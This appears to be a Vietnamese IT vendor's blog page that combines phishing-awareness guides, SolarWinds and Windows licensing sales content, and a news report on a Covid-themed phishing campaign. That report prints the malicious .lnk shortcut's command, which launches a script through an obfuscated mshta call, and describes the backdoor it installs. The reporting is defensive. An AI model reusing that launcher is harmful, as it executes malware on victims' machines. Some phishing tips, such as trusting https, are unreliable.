Nhận biết và tự bảo vệ lại Phishing như thế nào?

Nhận biết và tự bảo vệ lại Phishing như thế nào?

Phishing hay tấn công giả mạo là một trong những hình thức tấn công mạng hiệu quả và được các hacker ưa dùng bởi một trong yếu tố góp phần thành công của phishing chính là sự bất cẩn, vô ý của người dùng. Bài viết này giúp trang bị cho bạn kiến thức tự bảo vệ khỏi các cuộc tấn công lừa đảo.

Nhận biết phishing & tự bảo vệ khỏi phishing

Phishing trực tiếp được xem là một hình thức trộm cắp các thông tin nhận diện của một cá nhân. Dùng phương pháp gian lận không chính thống để thu thập dữ liệu của cá nhân. Dễ hiểu hơn, đó là một nhóm người có chiêu thức lừa đảo để cướp tiền của bạn ngoài đời thật. Với chiêu thức gửi các email giả mạo với nội dung hoặc tiêu đề khá giống với những chủ đề mà người nhận đang quan tâm. Người nhận sẽ trở thành nạn nhân của chúng thường bị đánh cấp mật khẩu truy cập các tài khoản thẻ, ứng dụng thanh toán và các thông tin cá nhân khác để phục vụ hành vi đánh cắp tài chính của kẻ xấu.
Để nhận biết thế nào là Phishing email, nó sẽ yêu cầu người nhận mở liên kết thông qua nội dung email, sau đó tiến hành xác thực và cập nhật lại các thông tin cá nhân kể cả thẻ ngân hàng, khi chúng nhận được thông tin thì người nhận trở thành nạn nhân của trò lừa Phishing trực tuyến này. Cũng dùng chiêu thức spam email, kẻ gian gửi đến cùng lúc đến nhiều người nhận với hy vọng một vài trong số đó trở thành nạn nhân.

Nhận biết phishing & tự bảo vệ khỏi phishing

Vì sao người nhận bị trở thành nạn nhân, vì chúng đã thu thập được thông tin từ thiết bị của người nhận trước đó, biết được thói quen sử dụng các thiết bị các nhân và giao dịch trực tuyến. Chúng giả mạo những thông tin tương tự để nạn nhân nhầm tưởng đó là những email ngày thường đang làm việc. Kẻ tạo thông tin giả mạo thường sẽ sao chép các nội dung người nhận có phản hồi trước đó (với ngân hàng, với đồng nghiệp, với các khách hàng…) Kế tiếp, chúng sẽ tinh tế tạo ra các địa chỉ website/email giả mạo giống 99,99% để đánh lừa, bằng cách thêm vào một hoặc vài ký tự bất kỳ “dễ nhầm” hoặc khó phát hiện khi nạn nhân có thói quen đọc lướt qua. Ví dụ thêm chữ “s” vào tên miền website hoặc địa chỉ email.

Nhận biết phishing & tự bảo vệ khỏi phishing
Email paypal giả mạo

Với chiêu trò này, bạn có thể là nạn nhân của phishing bất cứ lúc nào. Vì vậy, hãy tham khảo các gợi ý hữu ích dưới đây để có quyết định đúng đắn tự bảo vệ chính mình khỏi Phishing.

Các biện pháp bảo vệ đơn giản mà hiệu quả khỏi phishing

  • Lập thói quen kiểm tra kỹ tên miền website và địa chỉ email.
  • Không gửi thông tin các nhân trước khi kiểm tra bằng các phương tiện khác.
  • Thiết bị dùng để lưu trữ thông tin cá nhân phải được trang bị thêm phần mềm bảo mật an toàn.

Thói quen kiểm chứng thông tin

Bước đầu tiên là nhìn kỹ tên miền của website bạn đang truy cập hoặc địa chỉ email, nếu không được kết thúc với các từ khóa quen thuộc tênmiền.com, tênmiền.com.vn, hay tênmiền.vn hoặc email@tênmiền.com, email@tênmiền.com.vn, hay email@tênmiền.vn… thì bạn không nên tiếp tục truy cập hoặc phản hồi. Thực tế, một nhóm hacker đã kiểm soát được mail của doanh nghiệp, chúng có thể tạo ra một user mới có tên giống 99% tên của một lãnh đạo cấp cao để trao đổi với bạn yêu cầu các nhân viên điền thông tin theo mệnh lệnh của cấp trên. Vì vậy kiểm tra thật kỹ, và xác minh qua bằng các phương tiện khác như gọi điện trực tiếp hoặc trao đổi trực tuyến với bộ phận gửi yêu cầu, trước khi gửi thông tin cá nhân. Ngoài ra, một tên miền an toàn sẽ có ký tự https:// phía trước chữ “s” trong từ https là một cách để xác định độ tin cậy trước khi bạn gửi thông tin của mình.
Hiện Yahoo và Gmail là dịch vụ email cá nhân phổ biến và miễn phí, họ cũng có những thuật toán có antispam. Hoặc bạn cũng có thể kết hợp thêm các giải pháp phần mềm antispam để đảm bảo bạn không trở thành nạn nhân bị phising.

Điều bạn cần làm khi nghĩ mình vừa bị phishing

  • Nếu bạn vừa cập nhật tài khoản lại thông tin trên trang lừa đảo, hãy tìm đến trang chính thức
  • Đổi ngay mật khẩu để không cho kẻ gian đăng nhập lại.
  • Kiểm tra số dư hoặc kiểm tra phát sinh mới nếu có.
  • Kiểm tra các thông tin như địa chỉ email, địa chỉ nhà và chắc chắn là đúng thông tin của bạn.
  • Nếu không thể đổi lại liên hệ ngay với dịch vụ tài khoản nhờ trợ giúp.
  • Nếu bạn vừa thực hiện gửi thông tin thẻ cho kẻ lợi dụng, thì phải gọi đến dịch vụ ngân hàng để báo mất hoặc phong tỏa tài khoản ngây lập tức.

Kết luận

Ngày nay, phising không chỉ qua email hoặc website, nó đang lan tỏa ra các ứng dụng mạng xã hội như Facebook, Twitter. Các trò chơi đố vui kèm theo các phần thưởng giá trị đánh lừa bạn nhập thông tin cá nhân để nhận thưởng hoặc chúng đưa ra các câu hỏi giống dạng hỏi xác thực khi lập tài khoản để dự đoán mật khẩu của bạn. Năm 2018-2019, các loại tiền ảo lên ngôi, lừa đảo phising lợi dụng các group chat gửi các hình thức lừa đảo biến thiết bị nạn nhân thành các thiết bị đào tiền ảo và đừng bao giờ cắn câu kẻ phishing!

Sale Vinsep biên soạn

Phishing là gì? và những điều bạn cần biết

Phishing là gì? và những điều bạn cần biết

Phòng bệnh hơn chữa bệnh, cách bảo vệ bạn khỏi phishing tốt nhất là hiểu về nó cũng như nắm được các cách tấn công chính từ đó có phương pháp phòng vệ hiệu quả.

1.Định nghĩa về phishing

Phishing (Tấn công giả mạo) là hình thức tấn công mạng mà kẻ tấn công giả mạo thành một đơn vị uy tín để lừa đảo người dùng cung cấp thông tin cá nhân cho chúng.

Thông thường, tin tặc sẽ giả mạo thành ngân hàng, trang web giao dịch trực tuyến, ví điện tử, các công ty thẻ tín dụng để lừa người dùng chia sẻ các thông tin nhạy cảm như: tài khoản & mật khẩu đăng nhập, mật khẩu giao dịch, thẻ tín dụng và các thông tin quý giá khác.

Phương thức tấn công này thường được tin tặc thực hiện thông qua email và tin nhắn. Người dùng khi mở email và click vào đường link giả mạo sẽ được yêu cầu đăng nhập. Nếu “mắc câu”, tin tặc sẽ có được thông tin ngay tức khắc.

Phương thức phishing được biết đến lần đầu tiên vào năm 1987. Nguồn gốc của từ Phishing là sự kết hợp của 2 từ: fishing for information (câu thông tin) và phreaking (trò lừa đảo sử dụng điện thoại của người khác không trả phí). Do sự giống nhau giữa việc “câu cá” và “câu thông tin người dùng”, nên thuật ngữ Phishing ra đời.

2.Hình thức Phishing phổ biến:

2.1.Giả mạo email

phishing là gì & những điều cần biết

Một trong những kỹ thuật cơ bản trong tấn công Phishing là giả mạo email. Tin tặc sẽ gửi email cho người dùng dưới danh nghĩa một đơn vị/tổ chức uy tín, dụ người dùng click vào đường link dẫn tới một website giả mạo và “mắc câu”.

Những email giả mạo thường rất giống với email chính chủ, chỉ khác một vài chi tiết nhỏ, khiến cho nhiều người dùng nhầm lẫn và trở thành nạn nhân của cuộc tấn công.

Để làm cho nội dung email giống thật nhất có thể, kẻ tấn công luôn cố gắng “ngụy trang” bằng nhiều yếu tố:

  • Địa chỉ người gửi (VD: địa chỉ đúng là [email protected] thì địa chỉ giả mạo có thể là [email protected])
  • Chèn Logo chính thức của tổ chức để tăng độ tin cậy
  • Thiết kế các cửa sổ pop-up giống y hệt bản gốc (cả về màu sắc, font chữ,…)
  • Sử dụng kĩ thuật giả mạo đường dẫn (link) để lừa người dùng (VD: text là vietcombank.com.vn nhưng khi click vào lại điều hướng tới vietconbank.com.vn)
  • Sử dụng hình ảnh thương hiệu của các tổ chức trong email giả mạo để tăng độ tin cậy.

2.2.Giả mạo website

Thực chất, việc giả mạo website trong tấn công Phishing chỉ là làm giả một Landing page chứ không phải toàn bộ website. Trang được làm giả thường là trang đăng nhập để cướp thông tin của nạn nhân. Kỹ thuật làm giả website có một số đặc điểm sau:

  • Thiết kế giống tới 99% so với website gốc
  • Đường link (url) chỉ khác 1 ký tự duy nhất. VD: reddit.com (thật) vs redit.com (giả); google.com vs gugle.com; microsoft.com vs mircosoft.com hoặc verify-microsoft.com.
  • Luôn có những thông điệp khuyến khích người dùng nhập thông tin cá nhân vào website (call-to-action).

2.3.Hỗn hợp, nâng cao

Hiện nay, các nhà cung cấp dịch vụ email như Google hay Microsoft đều có những bộ lọc email spam/phishing để bảo vệ người dùng. Tuy nhiên những bộ lọc này hoạt động dựa trên việc kiểm tra văn bản (text) trong email để phát hiện xem email đó có phải phishing hay không. Hiểu được điều này, những kẻ tấn công đã cải tiến các chiến dịch tấn công Phishing lên một tầm cao mới. Chúng thường sử dụng ảnh hoặc video để truyền tải thông điệp lừa đảo thay vì dùng text như trước đây. Người dùng cần tuyệt đối cảnh giác với những nội dung này.

3.Phòng chống cơ bản phishing

3.1.Cách phòng chống Phishing hiệu quả:

  • Training cho nhân viên để tăng kiến thức sử dụng internet an toàn. Thường xuyên tổ chức các buổi tập huấn, diễn tập các tình huống giả mạo.
  • Không gởi thư từ quan trọng bí mật qua mail, nếu có hãy sử dụng các biện pháp mã hóa hoặc quản lí dữ liệu chia sẽ phù hợp.
  • Tuyệt đổi không nhấp vào những đường link không rõ ràng hoặc những trnag web bạn không chắn chắn an toàn.
  • Triển khai bộ lọc spam.
  • Cài đặt và luôn cập nhật dữ liệu mới từ phần mềm diệu virus.
  • Sữ dụng tường lửa hoặc proxy để kiểm soát tốt hơn.
  • Chủ động bảo vệ các dữ liệu nhạy cảm và quan trọng.
  • Liên hệ với bộ phân liên quan ngay khi gặp sự cố bất thường.

3.2.Xác định một email lừa đảo:

Người gởi mail không rõ ràng và có chèn thếm vài kí tự bất thường. Vì dụ bình thường là [email protected]  nhưng hôm nay lại là [email protected].

phishing là gì & những điều cần biết
Mẫu email mạo danh/lừa đảo 1
phishing là gì & những điều cần biết
Mẫu email mạo danh/lừa đảo 2

Đặt biệt chú ý các email có nội dung nhạy cảm và đòi hỏi, ép buộc người dùng như:

  • “Nhấp chuột vào link bên dưới để truy cập đến tài khoản của bạn” / “Click the link below to gain access to your account.”
  • “Dear Valued Customer.” / “Kinh thưa quí khách hàng”.
  • “Nếu bạn không phản hồi trong vòng 48h, tài khoản của bạn sẽ bị ngừng hoạt động” / “If you don’t respond within 48 hours, your account will be closed.”
  • “Xác thực tài khoản của bạn” / “Verify your account”.

Xem thêm: Nhận biết và tự bảo vệ lại Phishing như thế nào?

Technical Vinsep biên soạn

Tư vấn mua Solarwinds bản quyền

Tư vấn mua Solarwinds bản quyền

Tư vấn mua các sản phẩn Solarwinds bản quyền phân phối chính hãng với 49 sản phẩm và tool cho giám sát mạng, hệ thống và cơ sở hạ tầng công nghệ thông tin.

Mua bản quyền các sản phẩm & tool Solarwinds như thế nào?

Khách hàng có thể mua bản quyền, yêu cầu báo giá bằng cách gửi đến email, điện thoại, chat trực tiếp trên web hoặc điền form:

Công Ty TNHH Mục Tiêu Số (MST: 0316094847)

Báo giá bản quyền các sản phẩm & tool Solarwinds

Solarwinds

12 + 13 =

Tại sao chọn mua Solarwinds ở Vinsep?

  • Giá tốt, cạnh tranh nhất thị trường.
  • Không chỉ phân phối, chúng tôi còn thực hiện các giải pháp CNTT/IT, do đó, chúng tôi hiểu rõ gốc độ kỹ thuật của sản phẩm giúp bạn sử dụng đúng sản phẩm đúng với nhu cầu/vấn đề của công ty.
  • Giao hàng nhanh, khách hàng nhận được license/giấy phép bản quyền chỉ trong thời gian ngắn sau khi mua.
  • Phương phức thanh toán đơn giản.
  • Phương thức quản lý sản phẩm/đơn hàn tinh gọn.
  • Miễn phí cài đặt/hỗ trợ khi mua các sản phẩm tại Vinsep.
  • Thời gian support tối đa chỉ 24h.
  • Hệ thống KnowledgeBase phát triển không ngừng.
  • Và còn nhiều hơn thế nữa.

Làm sao để xác định đúng nhu cầu?

Solarwinds xây dựng các sản phẩm của mình xung quanh các lĩnh vực sau, dựa vào nhu cầu bạn đang cần là gì? thuộc lĩnh vực gì mà từ đó chọn ra sản phẩm tương ứng, click vào từng link bên dưới để xem chi tiết:

Nếu bạn đã biết & đang sử dụng các sản phẩm của Solarwinds mà đang tìm 1 nền tảng quản lý toàn diện, tập trung, hiệu quả thì Solarwinds Orion Platform. là lựa chọn tốt nhất.

Trong trường hợp xem qua các sản phẩm & tool của Solarwinds tương ứng với từng lĩnh vực mà vẫn còn bối rối, chúng tôi xin đưa ra 2 đề xuất:

  • Các sản phẩm nổi bật của Solarwinds: là các tool & sản phẩm mạnh mẽ, đa năng mà có chi phí tương đối phù hợp với ngân sách vừa & nhỏ của doanh nghiệp.
  • Các sản phẩm phổ biến của Solarwinds: là các tool & sản phẩm được ưa dùng, đã mang lại danh tiếng cho Solarwinds.

CÁC SẢN PHẨM SOLARWINDS NỔI BẬT

Solarwinds Tools

WEB HELP DESK

Giá cả phải chăng, tạo vé help desk và quản lý tài sản CNTT.

DAMEWARE REMOTE SUPPORT

Công cụ quản lý hệ thống và điều khiển từ xa.

DAMEWARE® REMOTE EVERYWHERE

Hỗ trợ từ xa dựa trên đám mây, nhanh chóng và dung lượng nhẹ.

ENGINEER’S TOOLSET

Sáu mươi công cụ chẩn đoán và xử lý sự cố mạng cần thiết.

KIWI SYSLOG® SERVER

Quản lý nhật ký tập trung cho các thiết bị và máy chủ mạng.

NETWORK TOPOLOGY MAPPER

Tự động vẽ sơ đồ mạng của bạn chỉ trong vài phút.

SERV-U® MANAGED FILE TRANSFER

Chuyển tập tin an toàn trong và ngoài tổ chức của bạn.

ipMONITOR

Giám sát CNTT cho mạng, máy chủ và ứng dụng.

Application Management

PINGDOM

Giám sát hiệu suất trang web được tin cậy bởi hơn 850.000 người dùng.

PAPERTRAIL

Quản lý nhật ký được lưu trữ trên đám mây để giúp khắc phục sự cố trong cơ sở hạ tầng và ứng dụng của bạn.

APPOPTICS

Ứng dụng liền mạch và giám sát cơ sở hạ tầng; khả năng hiển thị toàn diện có thể cung cấp xử lý sự cố ứng dụng nhanh hơn.

LOGGLY

Giám sát nhật ký và phân tích nhật ký được lưu trữ trên đám mây.

Các sản phẩm phổ biến của Solarwinds

Tất cả các sản phẩm của Solarwinds đều chứng minh được khả năng đáp ứng với nhu cầu thực tế thông qua độ phổ biến ngày một tăng không chỉ trong giới CNTT mà còn cho cả các người dùng cuối. Sau đây là 1 số sản phẩm được ưa chuộng nhất:

  • Network Performance Monitor: Giảm sự cố mạng và cải thiện hiệu suất với phần mềm giám sát mạng tiên tiến.
  • Server & Aplication monitor: Khả năng biểu hiện chi tiết hiệu năng của các ứng dụng thương mại hoặc tuỳ chỉnh. Khả năng theo dõi Private, Public và Hybrid Cloud.
  • Database Performance Analyzer: Chẩn đoán và tối ưu Database. Hỗ trợ nhiều nhà cung cấp trên nhiều môi trường khác nhau như vật lý, ảo hoá và cloud.
  • Virtualization Manager: Xác định và khắc phục các lỗi của môi trường ảo hoá Hyber-V, VMware & vShere. Khả năng kiểm soát và sắp xếp cho môi trường ảo hoá.
  • Network Bandwith Analyzer Pack: Khả năng điều chỉnh các báo cáo lưu lượng mạng. Hỗ trợ đa luồng, đa nhà cung cấp.
  • Storage Resource Monitor: Tập trung báo cáo thông tin lưu trữ từ các nhà cung cấp & thiết bị. Xác định chuẩn xác nơi lưu trữ bị thắt nút.
  • Network Configuration Manager: Khả năng cấu hình & thay đổi mạng từ nhiều nhà cung cấp khác nhau. Thông báo sự thay đổi cấu hình mạng theo thời gian thực.
  • Security Event Manager: Đơn giản các file log và giúp bạn xác định nhanh chóng các vấn đề bảo mật. Khả năng thiết lập các ngoại lệ cùng báo cáo mạnh mẽ giúp bạn đáp ứng các yêu cầu khắc khe nhất.

Nếu vẫn còn phân vân, liên hệ VinSEP để được tư vấn hoàn toàn miễn phí, đúng nhu cầu & ngân sách công ty.

Chính sách cấp phép bản quyền/Licensing Solarwinds

Perpetual License

Bằng cách mua giấy phép vĩnh viễn (Perpetual) cho phần mềm SolarWinds®, bạn có quyền sử dụng phần mềm vô thời hạn. Điều này đòi hỏi một khoản phí trả trước và bao gồm hỗ trợ 24/7 của SolarWinds và quyền truy cập để nâng cấp phiên bản trong năm đầu tiên. Sau khi kết thúc năm đầu tiên, bạn có tùy chọn mua bảo trì/duy trì và hỗ trợ liên tục hàng năm với một khoản phí bổ sung.

Giấy phép vĩnh viễn (Perperual) thường được mua bằng cách sử dụng chi phí vốn (CapEx) và khấu hao trong một khoảng thời gian (chẳng hạn như ba đến năm năm). Có cả ưu điểm và nhược điểm khi sử dụng CapEx, và bạn nên tham khảo ý kiến của tổ chức tài chính của mình để xác định những gì tốt nhất cho nhu cầu của bạn.

  • Bạn giữ lại giấy phép sử dụng phần mềm vô thời hạn.
  • Bảo trì và hỗ trợ năm đầu tiên bao gồm tùy chọn gia hạn hỗ trợ sau năm 1.
  • Thường được mua bằng CapEx.

Subscription License

Giấy phép thuê bao (Subscription) hay thanh toán qua đăng ký (đôi khi được gọi là cấp phép dựa trên thời hạn) là một mô hình ngày càng phổ biến để mua giấy phép phần mềm. Với đăng ký (subscription), bạn trả tiền để sử dụng phần mềm cho một thời hạn xác định (bất cứ nơi nào từ một đến năm năm) với quyền gia hạn vào cuối kỳ. Trong thời hạn đăng ký, bạn nhận được hỗ trợ 24/7 của SolarWinds và quyền truy cập để nâng cấp phiên bản.

Chi phí đăng ký/thuê bao ít hơn nhiều so với chi phí trả trước của giấy phép vĩnh viễn; tuy nhiên, khi hết thời hạn, bạn không còn quyền sử dụng phần mềm. Giấy phép đăng ký thường được mua bằng chi phí hoạt động (OpEx), trái ngược với CapEx được sử dụng cho giấy phép vĩnh viễn. Đối với các tổ chức có CapEx hạn chế, giấy phép đăng ký có thể cung cấp cho bạn sự linh hoạt mà bạn cần. Cũng có thể có một số lợi thế về kế toán hoặc thuế khi sử dụng OpEx. Một lần nữa, hãy tham khảo ý kiến với tổ chức tài chính của bạn để xác định những gì tốt nhất cho bạn.

  • Bạn có quyền sử dụng phần mềm trong thời hạn đăng ký.
  • Bảo trì và hỗ trợ trong suốt thời gian thuê bao.
  • Thường được mua bằng OpEx.

Chi tiết Chính sách cấp phép bản quyền/Licensing Solarwinds

Tổng hợp tất cả các bài tư vấn mua, báo giá bản quyền phần mềm Solarwinds

Marketing Team | Vinsep

Cảnh giác với mã độc được phát tán qua email mạo danh thông báo của Thủ tướng về dịch Covid-19

Cảnh giác với mã độc được phát tán qua email mạo danh thông báo của Thủ tướng về dịch Covid-19

Theo ghi nhận của Công ty CMC Cyber Security, mã độc được chèn trong một tệp văn bản với tiêu đề “Chi thi cua Thu tuong Nguyen Xuan Phuc” nhằm đánh lừa người dùng. Mẫu mã độc này được mới được thu thập được qua hệ thống CMC Threat Intelligence.

Trong báo cáo phân tích của CMC Cyber Security về mẫu mã độc được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19, doanh nghiệp bảo mật này cho hay, thời gian gần đây do diễn biến của dịch Covid-19 khá phức tạp, nhiều nhóm hacker lợi dụng việc này để thực hiện các chiến dịch APT (tấn công có chủ đích – PV) nhằm vào các tổ chức trên thế giới, cũng như xuất hiện chiến dịch ở Việt Nam.

Mới đây, lợi dụng tình hình căng thẳng của dịch viêm đường hô hấp cấp Covid-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển được phát hiện đã thực hiện mạo danh văn bản thông báo của Chính phủ về tình hình dịch để đánh lừa người dùng.

File Giả Mạo

Cụ thể, mẫu mã độc được chèn trong một file word với tiêu đề “Chi Thi cua Thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. Theo phân tích của chuyên gia, file mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.

Tuy nhiên, file winword này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.

Cũng qua phân tích file mã độc được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19, các chuyên gia CMC Cyber Security cho biết, sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ tiến hành: tạo bản sao của 3 file thực thi vào thư mục profile của user hoặc alluserprofile nếu có đủ quyền administrator; thêm và khóa autorun để tự kích hoạt file thực thi vừa drop ra khi khởi động lại máy; tạo mutex, kết nối đến server (máy chủ) để nhận lệnh từ server; tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…

“Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp.

APT là một loại tấn công nguy hiểm, được đầu tư kỹ lưỡng nhằm đánh cắp các thông tin quan trọng và gây nhiều thiệt hại cho tổ chức. Để phòng ngừa các cuộc tấn công APT, luôn luôn phải chuẩn bị các phương án đề phòng và giám sát liên tục mới có thể đảm bảo tính an toàn cho hệ thống của người dùng cũng như cả tổ chức”, chuyên gia bảo mật nhấn mạnh.

Trước đó, trong trao đổi với ICTnews đầu tháng 2/2020, mặc dù chưa ghi nhận trường hợp email hay các link tin tức tiếng Việt có nội dung giả mạo về virus Corona (tên gọi hiện nay là Covid-19 –PV) có gắn mã độc, song khi đó các chuyên gia bảo mật của CMC, VSEC cũng đã cảnh báo rằng trong tương lai gần khả năng xuất hiện mã độc lợi dụng tin tức về dịch là rất cao.

“Hiện tượng lợi dụng các nội dung, thông tin nhạy cảm để phát tán mã độc đã, đang diễn ra hàng ngày không chỉ riêng các thông tin về Covid-19 mà còn nhiều thông tin khác. Nếu người dùng không cẩn thận khi click, mở các file chứa mã độc, người dùng có thể bị mất các thông tin cá nhân, ngoài ra các hacker có thể lợi dụng tài khoản lấy được của người dùng để lan truyền tin tức giả, phát tán mã độc”, chuyên gia bảo mật cảnh báo.

Để không bị hacker lừa phát tán mã độc trong bối cảnh tin giả về dịch Covid-19 đang xuất hiện nhiều trên mạng như hiện nay, các chuyên gia bảo mật khuyên người dùng cần cảnh giác cao khi tham gia vào thế giới online trên không gian mạng, chỉ đọc các thông tin từ nguồn chính thống của Bộ Y tế, Chính phủ; không mở email hay click vào link lạ; không mở các file được gửi từ nguồn không rõ ràng; thường xuyên cập nhật các bản vá bảo mật cho thiết bị cá nhân; và không chia sẻ các thông tin không chính thống trên mạng xã hội.

“Trường hợp bắt buộc phải tải file về nhưng thấy có nghi ngờ về nội dung hoặc người gửi thì người dùng cần forward email đó vào một email tạm thời khác và dùng một máy khác, tách biệt khỏi mạng đang làm việc để mở file. Nếu nắm về kĩ thuật hơn nữa thì có thể thử mở các file nghi ngờ tại các môi trường an toàn hơn (như máy ảo)”, chuyên giao bảo mật lưu ý thêm.

Theo ICT News

Windows 10 – Các hình thức cấp phép từ Microsoft

Windows 10 – Các hình thức cấp phép từ Microsoft

Các hình thức cấp phép Windows 10 bản quyền cho khách hàng từ Microsoft.

Windows Licensing (Hình thức cấp phép Windows) vốn được coi là chủ đề khá dễ nhầm lẫn không chỉ cho khách hàng đóng vai trò là người sử dụng, mà còn còn cả đại lý, đối tác của Microsoft là người bán. Điều này dẫn tới việc tư vấn chưa chính xác về hình thức cấp phép, ảnh hưởng tới quyền lợi của khách hàng khi mua và sử dụng Windows bản quyền.

Windows Licensing (Hình thức cấp phép Windows) là gì?

Khách hàng chi trả để có quyền sử dụng hợp pháp phần mềm Windows bản quyền thay vì sở hữu phần mềm này.

Windows Licensing cung cấp các hình thức hợp pháp cho khách hàng và đối tác của Microsoft để có Windows 10 bản quyền. Nhu cầu của khách hàng là rất đa dạng như:

  • Windows 10 trên máy tính mới mua?
  • Windows 10 cài song song hai hệ điều hành trên máy MacOS?
  • Windows 10 trên máy tính đang sử dụng, hiện chưa có Windows bản quyền?
  • Có/Không nhu cầu chuyển đổi Windows 10 sang máy tính mới?
  • Số lượng máy tính cần có Windows 10 hay quy mô mà khách hàng muốn triển khai?
  • Mục đích sử dụng Windows 10 trên thiết bị cho Cá nhân & Gia đình, hay Doanh nghiệp nhỏ/vừa/lớn, giáo dục, chính phủ…?

Windows Licensing cơ bản được tóm gọn trong bảng dưới đây:

Trong đó:

  • OEM (Original Equipment Manufacturer): Là hình thức Windows bản quyền được các nhà sản xuất, lắp ráp tích hợp sẵn trên máy tính mới trước khi giao máy cho khách hàng – người sử dụng cuối (End-User). Khi đó người dùng cuối đã chi trả cho cả Windows và phần cứng như một khối thống nhất.
  • FPP (Full Package Product): Là hình thức Khách hàng mua và được cấp phép sử dụng Windows 10 như một phần mềm độc lập như các phần mềm khác. Vì vậy khách hàng toàn quyền sử dụng Windows 10 này từ việc chuyển sang máy tính khác hay cài trên máy tính cả mới và cũ đều được.

So sánh giữa OEM và FPP:

Hai hình thức cấp phép còn lại thực sự là nội dung dễ nhầm lẫn cho đại lý, đối tác khi tư vấn cho khách hàng.

  • Volume Licensing Agreements (VL) – OLP: Là hình thức bản nâng cấp Windows cho số lượng từ 05 máy trở lên. Vì là bản nâng cấp, nên yêu cầu đầu tiên và bắt buộc là thiết bị phải sẵn có bản Windows Pro hoặc Hệ điều hành hợp lệ như là bản quyền nền*. Khách hàng mua cấp phép Windows theo hình thức Volume Lincesing để nâng cấp Windows hiện tại lên các phiên bản có các tính năng cao cấp, bảo mật hơn tùy theo quy mô và nhu cầu.
  • GGK/GGWA: Là Giải pháp hợp thức hóa Windows (GGWA/GGK) nhằm để sửa các vấn đề chưa tuân thủ cấp phép Windows trên các máy tính hiện có.
    • GGK (Get Genuine Kit): Hợp thức hóa bản quyền cho các máy tính cũ chưa dùng hệ điều hành bản quyền với cá nhân và doanh nghiệp nhỏ, có số lượng không vượt quá 05 thiết bị.
    • GGWA (Get Genuine Windows Agreement): Hợp thức hóa bản quyền cho doanh nghiệp nhỏ và vừa cho số lượng máy tính trên 05 máy theo dạng của Volume License – 1 key cài đặt nhiều thiết bị.

Miêu tả: Không có đĩa cài và tem, chỉ có bản thỏa thuận sử dụng giữ bên mua và Microsoft. Truy cập trang: https://www.microsoft.com/Licensing/servicecenter/default.aspx để lấy key và download.

Tóm lại, với MÁY TÍNH MỚI, khách hàng có những lựa chọn nào?

Với máy tính cũ, ĐANG SỬ DỤNG, người dùng có lựa chọn nào?

Sưu Tầm